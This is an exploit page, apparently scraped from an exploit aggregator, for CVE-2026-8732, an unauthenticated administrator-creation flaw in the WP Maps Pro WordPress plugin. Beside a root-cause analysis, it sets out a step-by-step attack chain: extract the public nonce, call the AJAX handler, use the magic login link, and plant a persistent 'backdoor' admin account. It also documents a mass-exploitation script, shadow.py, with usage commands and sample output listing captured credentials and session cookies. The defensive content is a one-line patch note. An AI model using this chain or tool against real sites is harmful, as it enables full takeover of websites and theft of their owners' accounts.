Share
## https://sploitus.com/exploit?id=9A2F776F-62A6-58BF-BE46-69B82EED9DCC
CVE-2026-8732 โ€” WP Maps Pro โ‰ค 6.1.0


  โ™ก Unauthenticated Privilege Escalation via Administrator Account Creation โ™ก
  === shadow โ™ก & friska ===



  
    
  
  
  
  
  




---

## ๐Ÿ“‹ Vulnerability Info



| Field | Details |
|-------|---------|
| **CVE ID** | CVE-2026-8732 |
| **CVSS Score** | 9.8 (Critical) |
| **CVSS Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **Type** | Missing Authentication for Critical Function |
| **Plugin** | WP Maps Pro (`wp-google-map-gold`) |
| **Affected** | All versions โ‰ค 6.1.0 |
| **Patched** | 6.1.1 |
| **Published** | May 28, 2026 |
| **Researcher** | [David Brown](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/david-brown) |
| **PoC** | Shadow & Friska ๐Ÿ˜ˆ |



---

## ๐Ÿ” Description

The **WP Maps Pro** plugin for WordPress is vulnerable to **Unauthenticated Privilege Escalation via Administrator Account Creation**.

The `wpgmp_temp_access_ajax` AJAX action is registered with `wp_ajax_nopriv_` and protected only by a nonce check using the `fc-call-nonce` nonce โ€” which is **publicly embedded into every frontend page** via `wp_localize_script` as the `nonce` field of the `wpgmp_local` JavaScript object.

This renders the nonce check **completely ineffective** as an access control mechanism, allowing unauthenticated attackers to:

1. Extract the nonce from any public page
2. Invoke the `wpgmp_temp_access_support` handler with `check_temp=false`
3. Trigger unconditional creation of a new WordPress **Administrator** account
4. Receive a magic login URL that calls `wp_set_auth_cookie()` โ€” granting full admin access
5. Create a persistent backdoor account

> **Result:** Complete site takeover with zero prior authentication.

---

## ๐Ÿงฌ Root Cause Analysis

### 1. Hook Registered Inside `is_admin()` Block โ€” But `is_admin()` is Always True for AJAX

```php
// wp-google-map-gold.php
if ( is_admin() ) {  // โ† is_admin() = TRUE for all admin-ajax.php requests!
    add_action( 'wp_ajax_wpgmp_temp_access_ajax',        [ $this, 'wpgmp_temp_access_ajax_callback'] );
    add_action( 'wp_ajax_nopriv_wpgmp_temp_access_ajax', [ $this, 'wpgmp_temp_access_ajax_callback'] ); // โ† nopriv = unauthenticated!
}
```

### 2. Nonce Exposed to Every Frontend Page

```php
// classes/wpgmp-helper.php
$wpgmp_local = [
    'urlforajax' => admin_url( 'admin-ajax.php' ),
    'nonce'      => wp_create_nonce( 'fc-call-nonce' ),  // โ† LEAKED to public HTML!
    // ...
];
wp_localize_script( 'wpgmp-google-map-main', 'wpgmp_local', $wpgmp_local );
```

Any visitor can read the nonce from page source. WordPress nonces are CSRF tokens โ€” not authentication tokens.

### 3. No Capability Check in AJAX Callback

```php
function wpgmp_temp_access_ajax_callback(){
    check_ajax_referer( 'fc-call-nonce', 'nonce' );  // โ† bypassed via public nonce
    // NO current_user_can() check!
    $temp_access = new WPGMP_Temp_Access();
    $response = $temp_access->wpgmp_temp_access_support();
    wp_send_json($response);
}
```

### 4. Unconditional Admin Account Creation

```php
// classes/wpgmp-temp-access.php
if (isset($_POST['check_temp']) && $_POST['check_temp'] == 'false') {
    $username = 'fc_user_' . uniqid();          // random username
    $email    = 'support@flippercode.com';       // hardcoded email
    $role     = 'administrator';                 // hardcoded role โ† ROOT CAUSE

    $result = self::fc_create_new_user($username, $email, $role);

    if (is_numeric($result)) {
        $access_link = self::generate_login_link($result);
        $response['url'] = $access_link;         // โ† magic URL returned to attacker!
    }
}
```

### 5. Magic Login via `init` Hook โ€” No Expiry, No Single-Use

```php
// Hooked to init โ€” runs on EVERY request, no auth required
function wpgmp_access_token_check(){
    if ( ! empty( $_GET['wpgmp_token'] ) ) {
        $temp_access->get_valid_user_based_on_wpgmp_token($wpgmp_access_token);
    }
}

// Inside get_valid_user_based_on_wpgmp_token():
wp_set_current_user( $temporary_user_id, $temporary_user_login );
wp_set_auth_cookie( $temporary_user_id );   // โ† SESSION SET AS ADMIN
wp_safe_redirect( admin_url() );            // โ† REDIRECT TO DASHBOARD
```

---

## โš”๏ธ Attack Chain

```
[Unauthenticated Attacker]
         โ”‚
         โ–ผ
   GET /any-page/
   โ† HTML: wpgmp_local = {"nonce":"XXXXXXXX",...}
         โ”‚
         โ–ผ
   POST /wp-admin/admin-ajax.php
   action=wpgmp_temp_access_ajax
   nonce=XXXXXXXX
   check_temp=false
   โ† {"url":"https://target.com/wp-admin/?wpgmp_token="}
         โ”‚
         โ–ผ
   GET /wp-admin/?wpgmp_token=
   โ† wp_set_auth_cookie() fired
   โ† 302 โ†’ /wp-admin/
         โ”‚
         โ–ผ
   [Full Administrator Access] ๐Ÿ’€
         โ”‚
         โ–ผ
   POST /wp-json/wp/v2/users
   X-WP-Nonce: 
   {"username":"backdoor","password":"...","roles":["administrator"]}
         โ”‚
         โ–ผ
   [Persistent Backdoor Created] ๐Ÿ˜ˆ
```

---

## ๐Ÿ› ๏ธ Tools

### `shadow.py` โ€” Full Exploit Chain

Single target or mass exploitation.

```bash
# Interactive
python3 shadow.py

# Single target
python3 shadow.py -u https://target.com

# Mass exploit
python3 shadow.py -f targets.txt -t 20
```

**Exploit Phases:**
```
Phase 1  โ–ถ  Plugin & Feature Detection
Phase 2  โ–ถ  Nonce Scan (parallel crawler)
Phase 3  โ–ถ  Admin Creation via AJAX
Phase 4  โ–ถ  Magic Login (wp_set_auth_cookie)
Phase 5  โ–ถ  Persistent Backdoor (REST API)
```

**Output (`pwned.txt`):**
```
1.
=======================================================
Target    : https://target.com/wp-admin/
User      : shadow_xxxxx
Pass      : Xk9#mQ2pLrTv8nYw
Email     : xxxxx@xxxx.com
Magic     : https://target.com/wp-admin/?wpgmp_token=...
=======================================================

Cookies :

=======================================================
wordpress_logged_in_...=fc_user_...
=======================================================
```

---

## ๐Ÿ”’ Mitigation

Update WP Maps Pro to version **6.1.1** or newer.

---



**[shadow โ™ก friska]** โ€” for educational and authorized security research only